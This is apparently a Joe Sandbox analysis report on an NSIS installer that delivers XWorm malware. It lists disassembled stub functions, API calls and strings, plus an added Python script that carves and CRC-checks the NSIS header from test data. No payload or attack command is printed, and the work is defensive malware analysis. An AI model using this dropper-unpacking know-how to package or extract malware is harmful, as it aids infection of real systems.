• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 4283519449-527102705
                                                                                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
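The function above is the NSIS installer stub's header loader: it opens its own image (GetModuleFileNameW, then CreateFileW and GetFileSize in the subcall), scans it for the NSIS "firstheader", and reports the integrity-check string when the signature or CRC does not match. The three string xrefs "Null" (0040366C), "soft" (00403675) and "Inst" (0040367E) are the dword-wise comparison against the "NullsoftInst" magic; "Error launching installer" (004035D7) is reached only when the open fails, before the scan. The script below is an added example for carving that structure from a sample offline. It is neither Joe Sandbox output nor NSIS code: the struct layout, the 0xDEADBEEF siginfo and the CRC placement (CRC32 of everything preceding it, stored as the last dword of the data block) are taken from the editor's reading of the NSIS source (exehead/fileform.h, Main.c) rather than from this report, so confirm them against the NSIS version that built the sample. The input buffer is constructed test data, not the analysed file.

```python
"""Carve the NSIS firstheader that an NSIS installer stub scans its own image for.

Added example, not Joe Sandbox output and not NSIS code. Layout, signature and
CRC placement are assumptions based on NSIS exehead/fileform.h and Main.c.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"           # the "Null" / "soft" / "Inst" dword compares in the stub
FH_FMT = "<II12sII"                  # flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FH_SIZE = struct.calcsize(FH_FMT)    # 28 bytes

FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8

# Strings the stub references (report xrefs 004035D7 and 004037C5)
ERR_OPEN = "Error launching installer"
ERR_CRC = "Installer integrity check has failed"

_NEEDLE = struct.pack("<I", FH_SIG) + FH_MAGIC


def find_firstheader(data: bytes):
    """Return (offset, fields) of the first firstheader in data, or None.

    The stub walks its own image looking for this signature; this scan checks
    every byte offset rather than the stub's block-aligned steps, so it also
    finds a firstheader at an unaligned offset (e.g. inside a carved overlay)."""
    pos = data.find(_NEEDLE)
    while pos != -1:
        start = pos - 4                           # the flags dword precedes siginfo
        if start >= 0 and start + FH_SIZE <= len(data):
            flags, _sig, _magic, hdr_len, total_len = struct.unpack_from(FH_FMT, data, start)
            return start, {
                "flags": flags,
                "length_of_header": hdr_len,                # size of the decompressed header
                "length_of_all_following_data": total_len,  # firstheader + data block (+ CRC)
            }
        pos = data.find(_NEEDLE, pos + 1)
    return None


def verify_crc(data: bytes, start: int, total_len: int):
    """CRC32 over data[0 : end-4] must equal the dword stored at end-4 (assumed NSIS layout)."""
    end = start + total_len
    stored = struct.unpack_from("<I", data, end - 4)[0]
    computed = zlib.crc32(data[: end - 4]) & 0xFFFFFFFF
    return stored == computed, stored, computed


def analyse(data: bytes) -> dict:
    """Mirror the stub's decisions: locate the firstheader, bounds-check it, verify the CRC."""
    found = find_firstheader(data)
    if found is None:
        # No signature anywhere: the stub ends up at the integrity-check message.
        return {"nsis": False, "error": ERR_CRC}
    start, fh = found
    end = start + fh["length_of_all_following_data"]
    result = {"nsis": True, "offset": start, "datablock_offset": start + FH_SIZE,
              "crc_ok": None, **fh}
    if fh["length_of_all_following_data"] < FH_SIZE or end > len(data):
        result["error"] = ERR_CRC                 # incomplete download: data block runs past EOF
        return result
    if not fh["flags"] & FH_FLAGS_NO_CRC:
        ok, _stored, _computed = verify_crc(data, start, fh["length_of_all_following_data"])
        result["crc_ok"] = ok
        if not ok:
            result["error"] = ERR_CRC             # damaged media: stored CRC does not match
    return result


def build_sample(stub: bytes, header: bytes, payload: bytes, flags: int = 0) -> bytes:
    """Build a constructed buffer in the firstheader layout (test data, not a real PE)."""
    body = header + payload
    crc_len = 0 if flags & FH_FLAGS_NO_CRC else 4
    fh = struct.pack(FH_FMT, flags, FH_SIG, FH_MAGIC, len(header), FH_SIZE + len(body) + crc_len)
    blob = stub + fh + body
    if crc_len:
        blob += struct.pack("<I", zlib.crc32(blob) & 0xFFFFFFFF)
    return blob


if __name__ == "__main__":
    sample = build_sample(b"MZ" + b"\x00" * 510, b"H" * 40, b"payload")   # constructed input
    print(analyse(sample))
    damaged = bytearray(sample)
    damaged[545] ^= 0xFF                         # flip a byte inside the data block
    print(analyse(bytes(damaged)))
```

On a real sample, `datablock_offset` is where the compressed NSIS header begins; carving from there is the usual first step before unpacking the embedded XWorm payload with an NSIS extractor, and a CRC mismatch on a file pulled from a sandbox or proxy cache usually means the capture was truncated rather than that the sample was tampered with.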

Control-flow Graph (rendered graph with Executed / Not Executed block colouring; edge data omitted. Entry block 40337f-403396; blocks continue through 403585.)
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                          • GetTickCount.KERNEL32 ref: 00403464
                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                          • wsprintfW.USER32 ref: 004034A4
                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                          • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                          • API String ID: 651206458-1535804072
                                                                                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Control-flow Graph (rendered graph with Executed / Not Executed block colouring; edge data omitted. Entry block 404f72-404f85; blocks continue through 405042-405044.)
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2740478559-0
                                                                                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
• Basic blocks and edges: 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
APIs
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
• GlobalFree.KERNELBASE(007FCAD8), ref: 00402387
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: FreeGloballstrcpyn
• String ID: Exch: stack < %d elements$HeadersLobbyDeclineGirlfriend$Pop: stack empty
• API String ID: 1459762280-2688107579
• Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
• Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
• Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
• Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
• Basic blocks and edges: 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
• GlobalFree.KERNELBASE(007FCAD8), ref: 00402387
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0
• Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
• Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
• Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
• Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
• Basic blocks and edges: 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
APIs
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0
• Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
• Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
• Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
• Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
• Basic blocks and edges: 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
APIs
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: PrivateProfileStringWritelstrcpyn
• String ID: <RM>$HeadersLobbyDeclineGirlfriend$WriteINIStr: wrote [%s] %s=%s in %s
• API String ID: 247603264-4101937001
• Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
• Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
• Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
• Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
• Basic blocks and edges: 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                                                          APIs
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: nsa
                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
APIs
• GlobalFree.KERNELBASE(?), ref: 004073C5
• GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
• GlobalFree.KERNELBASE(?), ref: 0040743D
• GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
Similarity
• API ID: Global$AllocFree
• String ID:
• API String ID: 3394109436-0
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCreate
                                                                                                          • String ID:
                                                                                                          • API String ID: 415043291-0
                                                                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
APIs
• GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
• Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
• Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
• Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
